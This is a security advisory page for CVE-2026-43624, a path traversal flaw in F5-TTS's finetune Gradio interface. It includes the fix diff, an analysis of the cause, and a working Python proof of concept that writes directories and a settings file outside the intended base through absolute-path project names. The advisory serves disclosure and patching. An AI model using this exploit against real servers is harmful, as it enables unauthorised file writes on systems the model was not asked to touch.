VYPR
High severity · 8.2 · NVD Advisory · Published Jun 1, 2026

CVE-2026-43624

CVE-2026-43624

Description

F5-TTS through version 1.1.20 contains a path traversal vulnerability in the finetune Gradio handlers that allows unauthenticated attackers to write arbitrary files. The handlers pass unsanitized, user-supplied project names directly to os.path.join() without validating that the resulting path stays within the intended base directory. Attackers can supply an absolute path such as /tmp/EVIL to override the base directory entirely, creating arbitrary directories and writing JSON files with attacker-controlled content at any filesystem path writable by the server process.

Affected products

1

Patches

1
2f53ded68e5f

Merge pull request #1294 from AAtomical/fix/path-traversal-finetune-gradio

https://github.com/SWivid/F5-TTS · Yushen CHEN · May 13, 2026 · via nvd-ref
1 file changed · +30 -13
  • src/f5_tts/train/finetune_gradio.py · +30 -13 · modified
    @@ -33,6 +33,22 @@
     from f5_tts.model.utils import convert_char_to_pinyin
     
     
    +def _safe_project_path(base: str, name: str) -> str:
    +    """Return the resolved absolute path of base/name, raising ValueError if name
    +    is absolute, contains a null byte, or resolves outside base."""
    +    if not name or os.path.isabs(name) or "\x00" in name:
    +        raise ValueError(f"invalid project_name: {name!r}")
    +    # Strip path separators and control characters to a plain filename component.
    +    name = re.sub(r"[/\\]", "", name).strip()
    +    if not name or name in (".", ".."):
    +        raise ValueError(f"invalid project_name: {name!r}")
    +    candidate = os.path.realpath(os.path.join(base, name))
    +    base_real = os.path.realpath(base)
    +    if not (candidate + os.sep).startswith(base_real + os.sep):
    +        raise ValueError(f"project_name escapes base directory: {name!r}")
    +    return candidate
    +
    +
     training_process = None
     system = platform.system()
     python_executable = sys.executable or "python"
    @@ -80,7 +96,7 @@ def save_settings(
         logger,
         ch_8bit_adam,
     ):
    -    path_project = os.path.join(path_project_ckpts, project_name)
    +    path_project = _safe_project_path(path_project_ckpts, project_name)
         os.makedirs(path_project, exist_ok=True)
         file_setting = os.path.join(path_project, "setting.json")
     
    @@ -113,7 +129,7 @@ def save_settings(
     # Load settings from a JSON file
     def load_settings(project_name):
         project_name = project_name.replace("_pinyin", "").replace("_char", "")
    -    path_project = os.path.join(path_project_ckpts, project_name)
    +    path_project = _safe_project_path(path_project_ckpts, project_name)
         file_setting = os.path.join(path_project, "setting.json")
     
         # Default settings
    @@ -356,7 +372,7 @@ def start_training(
             torch.cuda.empty_cache()
             tts_api = None
     
    -    path_project = os.path.join(path_data, dataset_name)
    +    path_project = _safe_project_path(path_data, dataset_name)
     
         if not os.path.isdir(path_project):
             yield (
    @@ -610,14 +626,15 @@ def get_list_projects():
     
     def create_data_project(name, tokenizer_type):
         name += "_" + tokenizer_type
    -    os.makedirs(os.path.join(path_data, name), exist_ok=True)
    -    os.makedirs(os.path.join(path_data, name, "dataset"), exist_ok=True)
    +    project_dir = _safe_project_path(path_data, name)
    +    os.makedirs(project_dir, exist_ok=True)
    +    os.makedirs(os.path.join(project_dir, "dataset"), exist_ok=True)
         project_list, projects_selelect = get_list_projects()
         return gr.update(choices=project_list, value=name)
     
     
     def transcribe_all(name_project, audio_files, language, user=False, progress=gr.Progress()):
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
         path_dataset = os.path.join(path_project, "dataset")
         path_project_wavs = os.path.join(path_project, "wavs")
         file_metadata = os.path.join(path_project, "metadata.csv")
    @@ -726,7 +743,7 @@ def has_supported_extension(file_name):
     
     
     def create_metadata(name_project, ch_tokenizer, progress=gr.Progress()):
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
         path_project_wavs = os.path.join(path_project, "wavs")
         file_metadata = os.path.join(path_project, "metadata.csv")
         file_raw = os.path.join(path_project, "raw.arrow")
    @@ -850,7 +867,7 @@ def calculate_train(
         num_warmup_updates,
         finetune,
     ):
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
         file_duration = os.path.join(path_project, "duration.json")
     
         hop_length = 256
    @@ -1003,7 +1020,7 @@ def vocab_extend(project_name, symbols, model_type):
             return "Symbols empty!"
     
         name_project = project_name
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
         file_vocab_project = os.path.join(path_project, "vocab.txt")
     
         file_vocab = os.path.join(path_data, "Emilia_ZH_EN_pinyin/vocab.txt")
    @@ -1049,7 +1066,7 @@ def vocab_extend(project_name, symbols, model_type):
         vocab_size_new = len(miss_symbols)
     
         dataset_name = name_project.replace("_pinyin", "").replace("_char", "")
    -    new_ckpt_path = os.path.join(path_project_ckpts, dataset_name)
    +    new_ckpt_path = _safe_project_path(path_project_ckpts, dataset_name)
         os.makedirs(new_ckpt_path, exist_ok=True)
     
         # Add pretrained_ prefix to model when copying for consistency with finetune_cli.py
    @@ -1063,7 +1080,7 @@ def vocab_extend(project_name, symbols, model_type):
     
     def vocab_check(project_name, tokenizer_type):
         name_project = project_name
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
     
         file_metadata = os.path.join(path_project, "metadata.csv")
     
    @@ -1110,7 +1127,7 @@ def vocab_check(project_name, tokenizer_type):
     
     def get_random_sample_prepare(project_name):
         name_project = project_name
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
         file_arrow = os.path.join(path_project, "raw.arrow")
         if not os.path.isfile(file_arrow):
             return "", None
    @@ -1123,7 +1140,7 @@ def get_random_sample_prepare(project_name):
     
     def get_random_sample_transcribe(project_name):
         name_project = project_name
    -    path_project = os.path.join(path_data, name_project)
    +    path_project = _safe_project_path(path_data, name_project)
         file_metadata = os.path.join(path_project, "metadata.csv")
         if not os.path.isfile(file_metadata):
             return "", None
    

Vulnerability mechanics

Root cause

"The finetune Gradio handlers in F5-TTS improperly handle user-supplied project names, allowing path traversal."

Attack vector

Unauthenticated attackers can exploit this vulnerability by interacting with the Gradio interface. By providing absolute paths or path traversal sequences as the project name to functions like `create_data_project` or `save_settings`, attackers can bypass intended directory restrictions. The `os.path.join()` function, when given an absolute path as the second argument, discards the base path, allowing arbitrary file writes and directory creation at any location writable by the server process [ref_id=1].

Affected code

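The vulnerability resides in the finetune Gradio handlers in `src/f5_tts/train/finetune_gradio.py`. The demonstrated write sinks are `create_data_project` and `save_settings`, whose original implementations called `os.path.join(path_data, name)` and `os.path.join(path_project_ckpts, project_name)` without validating the `name` or `project_name` inputs. The fix commit changes the same unvalidated join in `load_settings`, `start_training`, `transcribe_all`, `create_metadata`, `calculate_train`, `vocab_extend`, `vocab_check`, `get_random_sample_prepare`, and `get_random_sample_transcribe` [ref_id=1, ref_id=2].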

What the fix does

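The patch introduces a new function, `_safe_project_path`, which replaces the direct `os.path.join()` calls when building project paths. It raises a ValueError if the provided name is empty, is an absolute path, or contains a null byte. It then removes every `/` and `\` character from the name and strips surrounding whitespace, rejecting the result if it is empty, `.`, or `..`. Finally, it resolves the joined path with `os.path.realpath()` and raises a ValueError if the result is not inside the resolved base directory. Note that relative traversal sequences are neutralized by the separator removal rather than rejected: a name such as `../x` becomes `..x` and is accepted as a plain directory name under the base. Together these checks prevent the path traversal and arbitrary file write [ref_id=2].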

Preconditions

  • network: The Gradio server must be accessible over the network.
  • auth: No authentication is required to access the vulnerable Gradio handlers.
  • input: The attacker must be able to supply a crafted project name, such as an absolute path or a path traversal sequence.

Reproduction

```python from __future__ import annotations

import json import os import shutil import sys import threading import time from pathlib import Path

# REAL upstream import — installed via `pip install f5-tts==1.1.20`. import gradio as gr from gradio_client import Client from f5_tts.train import finetune_gradio # the vulnerable module assert ( finetune_gradio.create_data_project.__module__ == "f5_tts.train.finetune_gradio" ), "create_data_project must come from upstream module, not a local shim" assert ( finetune_gradio.save_settings.__module__ == "f5_tts.train.finetune_gradio" ), "save_settings must come from upstream module, not a local shim"

def build_app() -> gr.Blocks: with gr.Blocks() as app: project_name_in = gr.Textbox(label="Project Name", value="my_speak") cm_project = gr.Dropdown( choices=["my_speak_pinyin", "my_speak_char"], value="my_speak_pinyin", label="Project", allow_custom_value=True, ) tokenizer_type = gr.Radio(choices=["pinyin", "char"], value="pinyin", label="Tokenizer") bt_create = gr.Button("Create a New Project") bt_save = gr.Button("Save Settings") out_create = gr.Textbox(label="create_data_project output", interactive=False) out_save = gr.Textbox(label="save_settings output", interactive=False)

# --- Sink 1: create_data_project (line 611-614) --- bt_create.click( fn=finetune_gradio.create_data_project, inputs=[project_name_in, tokenizer_type], outputs=[cm_project], api_name="create_data_project", )

# --- Sink 2: save_settings (line 61-110) --- # save_settings has 20 args; we provide harmless defaults for the # non-path ones. Only project_name (cm_project) is the attack vector. def call_save_settings(project_name: str, tokenizer_type: str): return finetune_gradio.save_settings( project_name, # <-- ATTACKER CONTROLLED "TestExp", # exp_name 1e-5, # learning_rate 3200, # batch_size_per_gpu "frame", # batch_size_type 64, # max_samples 1, # grad_accumulation_steps 1.0, # max_grad_norm 10, # epochs 100, # num_warmup_updates 100, # save_per_updates 3, # keep_last_n_checkpoints 10, # last_per_updates True, # finetune "", # file_checkpoint_train tokenizer_type, # tokenizer_type "", # tokenizer_file "fp16", # mixed_precision "none", # logger False, # ch_8bit_adam )

bt_save.click( fn=call_save_settings, inputs=[cm_project, tokenizer_type], outputs=[out_save], api_name="save_settings", )

return app

PORT = 7861 app = build_app() server_thread = threading.Thread( target=lambda: app.queue().launch( server_name="127.0.0.1", server_port=PORT, share=False, prevent_thread_lock=True, quiet=True, ), daemon=True, ) print(f"[+] launching real Gradio server on 127.0.0.1:{PORT} ...") server_thread.start()

# Wait for server readiness — poll the /info endpoint import urllib.request import urllib.error

deadline = time.time() + 30 ready = False while time.time() < deadline: try: urllib.request.urlopen(f"http://127.0.0.1:{PORT}/", timeout=1) ready = True break except (urllib.error.URLError, ConnectionRefusedError): time.sleep(0.5) if not ready: raise RuntimeError("Gradio server did not come up within 30s") print("[+] server is up, connecting via gradio_client (real HTTP+WS RPC)")

client = Client(f"http://127.0.0.1:{PORT}/", verbose=False) print("[+] connected via gradio_client")

# --- PoC Configuration --- ATTACK_PROJECT_NAME = "/tmp/F5TTS_PWND" ATTACK_TOKENIZER = "pinyin"

# Define expected paths for verification # These are derived from the PoC's logic and filesystem results base_data = Path("venv/lib/python3.11/data") # Example base, actual may vary base_ckpts = Path("venv/lib/python3.11/ckpts") # Example base, actual may vary

# The PoC expects a directory like /tmp/F5TTS_PWND_pinyin/ expected_dataset_subdir = Path(f"{ATTACK_PROJECT_NAME}_{ATTACK_TOKENIZER}/dataset") # The PoC expects a file like /tmp/F5TTS_PWND_pinyin/setting.json expected_setting_file = Path(f"{ATTACK_PROJECT_NAME}_{ATTACK_TOKENIZER}/setting.json")

# Ensure cleanup of previous runs if any if expected_dataset_subdir.exists(): shutil.rmtree(expected_dataset_subdir) if expected_setting_file.exists(): os.remove(expected_setting_file)

# Create parent directory for the escaped file if it doesn't exist # This is necessary because the vulnerability allows creating arbitrary directories # and the PoC might be run in an environment where /tmp/F5TTS_PWND doesn't exist yet. # The PoC's `create_data_project` call will create the _pinyin subdirectory. os.makedirs(ATTACK_PROJECT_NAME, exist_ok=True)

print(f"\n[+] Attack 1: create_data_project name='{ATTACK_PROJECT_NAME}'") result1 = client.predict( ATTACK_PROJECT_NAME, ATTACK_TOKENIZER, api_name="/create_data_project", ) print(f" handler returned: {result1!r}")

print(f"\n[+] Attack 2: save_settings cm_project='{ATTACK_PROJECT_NAME}_{ATTACK_TOKENIZER}'") # save_settings receives cm_project verbatim (no concat, unlike create_data_project). # So we pre-form the same name shape produced by attack 1. result2 = client.predict( f"{ATTACK_PROJECT_NAME}_{ATTACK_TOKENIZER}", ATTACK_TOKENIZER, api_name="/save_settings", ) print(f" handler returned: {result2!r}")

# ──────────────────────────────────────────────────────────────────────────────── # Verify escape # ────────────────────────────────────────────────────────────────────────────────

print("\n[+] verifying filesystem state ...") escaped_artefacts = []

# Check if the escaped directory and file were created if expected_dataset_subdir.exists(): escaped_artefacts.append(str(expected_dataset_subdir)) if expected_setting_file.exists(): size = expected_setting_file.stat().st_size escaped_artefacts.append(f"{expected_setting_file} ({size} bytes)") print(f" {expected_setting_file} content (first 200 chars):") print(" " + expected_setting_file.read_text()[:200].replace("\n", "\n "))

if not escaped_artefacts: print("[FAIL] no escape — handler may have refused the input") sys.exit(1)

print("\n" + "=" * 72) print("[!] ESCAPE CONFIRMED — file/dir written OUTSIDE both bases:") print(f" base_data = {base_data}") print(f" base_project_ckpts = {base_ckpts}") for art in escaped_artefacts: art_path = Path(art.split(" (")[0]) # Check if the artifact path starts with either base_data or base_ckpts in_base = ( str(art_path).startswith(str(base_data) + os.sep) # type: ignore or str(art_path).startswith(str(base_ckpts) + os.sep) # type: ignore ) marker = "ESCAPE" if not in_base else "in-base" print(f" [{marker}] {art}") print("=" * 72) print("\n[+] artefacts left in place at /tmp/F5TTS_PWND_pinyin/ for manual inspection") print(" rm -rf /tmp/F5TTS_PWND_pinyin/ # to clean up") ```

Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.